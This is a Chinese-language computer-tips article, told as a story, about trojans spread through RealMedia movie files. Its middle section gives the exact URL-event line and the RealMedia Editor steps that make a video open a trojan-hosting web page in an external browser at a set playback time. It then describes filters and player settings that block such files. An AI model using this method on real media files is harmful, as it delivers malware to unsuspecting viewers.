熱點推薦:
您现在的位置: 電腦知識網 >> 網絡技術 >> 正文

RM文件中木馬

2013-09-12 16:06:50  來源: 網絡技術 

  五一期間,到處都人滿為患,我還是選擇在家度過不長不短的七天長假,其實和我有同樣安排的人有很多,比如佳佳MM就是如此。為了緩解前段時間工作的壓力,她打算安安靜靜地呆在家裡哪也不去,准備和各種各樣的大片一同度過,正所謂“五一七天樂,在家也快樂”。www.sq120.com推薦文章
  五一剛過了兩天,第三天一大早醒來,我突然接到了佳佳MM的求助電話。“東渝哥哥,我想給你商量一件事,今天中午我請你吃飯好嗎?”這樣一句話使得躺在床上的我以為自己在做夢,連掐了自己幾下。“難道是鴻門宴!要知道以前我請她吃飯,都不肯賞臉,今天居然請我吃飯,一定是有求於我。”果然不出所料,在吃飯的時候,佳佳MM說自己的系統可能中了木馬程序,讓他幫忙看看。
  吃人嘴短,沒有辦法,吃完飯後我來到MM家裡。在認真查看了系統的進程後,發現一個可疑的“iexplore.exe”進程。“這不是IE浏覽器的進程嗎,我沒有運行啊,怎麼會有這個進程呢?”我的心中泛起了疑惑,“看來你的系統一定是中了某種木馬程序,IE浏覽器是被它調用的。”
  “我這幾天除了下載了三部電影,什麼也沒有下載啊!”MM說道。於是我對這三部電影進行檢查,發現果然不出所料,裡面有一些奇怪的鏈接。看來是中了網頁木馬,這個簡單,找到這個網頁,然後對症下藥,清除掉系統中的木馬。
  “看幾部電影就會中木馬?”佳佳MM不解地問道。tw.WingWIT.com“你不是說只有RealPlayer播放器的用戶才會中木馬的嗎?我用的可是MPC啊,怎麼也中木馬了呢?”我只好解釋:“以前是只有RealPlayer播放器才能中網頁木馬的,可現在的入侵方法日新月異,簡直是防不勝防啊。正好今天有空,給你露一手,看看入侵者如何在RM文件中加入惡意代碼的。”說做就做,馬上動手給MM演示。
再現RM木馬惡作劇
  “由於RM文件是網絡上最常用的多媒體文件類型之一,所以通過這種方法進行網頁木馬的傳播,可以讓受危害的用戶面更加的廣。其實這種方法最早是用於傳播網絡廣告的,而現在已經被入侵者利用,並且給普通的RM文件加入網頁木馬的鏈接的操作也並不復雜,通過一些現成的工具就可以完成,比如Helix Producer Plus、RealMedia Editor。”我給MM先介紹一下。
  “首先要准備一個RM視頻文件作為網頁木馬傳播的原材料,最好有一些吸引人的內容,不然受害者就不會觀看到木馬觸發的那個時間段。另外還有一個好處就是,當用戶津津有味地觀看電影的時候,是不會在乎彈出的網頁的。”我補充了一下。
  我首先打開記事本程序,新建一個文本文件,在上面輸入下面一段代碼,然後將其保存為mm.txt:
  u 00:00:20.0 00:00:30.0 &&_rpexternal&&http://www.cpcw.com/test.htm
  我來解釋一下這段代碼的意思。其中u是事件標志(Flag),表示要在文件中插入的是一個URL地址。接著第三個字段表示起止時間點,單位格式是“小時:分:秒.毫秒”,最後一個字段是你要彈出的URL的地址,“ _rpexternal”參數表示在外部浏覽器打開URL,而不是使用缺省的Realplayer內嵌的浏覽器打開URL。這裡表明當播放到第20秒或者將播放進度拖到第20秒至30秒之間的任意時間時,RM文件都會自動調用系統默認的浏覽器打開“http://www.cpcw.com/test.htm”的這個網頁鏈接,從而將木馬程序安裝到用戶的系統中。
  接著我運行RM視頻文件編輯工具RealMedia Editor,點擊“文件”菜單下的“打開Real媒體文件”命令來打開先前准備好的那段正常的RM視頻文件,然後點擊“工具”菜單下的“合並事件”命令,選擇剛才保存的那個文本文件。最後點擊“文件”菜單下的“RealMedia文件另存為”命令,將它另存為一個全新的RM文件,這樣一個攜帶了網頁木馬的RM文件就制作完成了。

為MM支招
  對於這種惡意的RM文件的防范,不同的情況可以采用不同的方法。對於那些可以下載到硬盤中的RM文件,我們可以通過一款名為“Real 媒體過濾器”的軟件對可疑的RM文件進行處理,將其中可能包含的一些外加的網頁鏈接和特效去除掉。運行“Real 媒體過濾器”,在“源文件”和“另存為”選項後進行相應的設置,然後點擊“開始過濾”按鈕就可去除可疑RM文件中的多余鏈接(如圖2)。過濾完成後,程序會彈出一個對話框並提示過濾的內容。
  另外,如果用戶使用MPC進行播放的話,可以把Real媒體文件的解碼類型設置為DirectShow即可,因為使用DirectShow格式可以自動屏蔽掉這些廣告。但因為RM文件是Real公司的獨家格式,所以DirectShow格式對於一些特殊的RM文件不能解碼。這時就只有使用RealMedia格式進行播放了,但自動屏蔽廣告的功能將失效。
  最後提醒廣大可愛的MM,及時到微軟網站去下載最新的安全補丁,堵住系統以及軟件的漏洞;安裝最新的反病毒軟件並及時更新病毒庫;安裝網絡防火牆,封堵不需要的端口,並對試圖連接互聯網的進程進行認真的篩選。

 
From:http://tw.wingwit.com/Article/Network/201309/931.html
  • 上一篇文章:

  • 下一篇文章:
  • Copyright © 2005-2013 電腦知識網 Computer Knowledge   All rights reserved.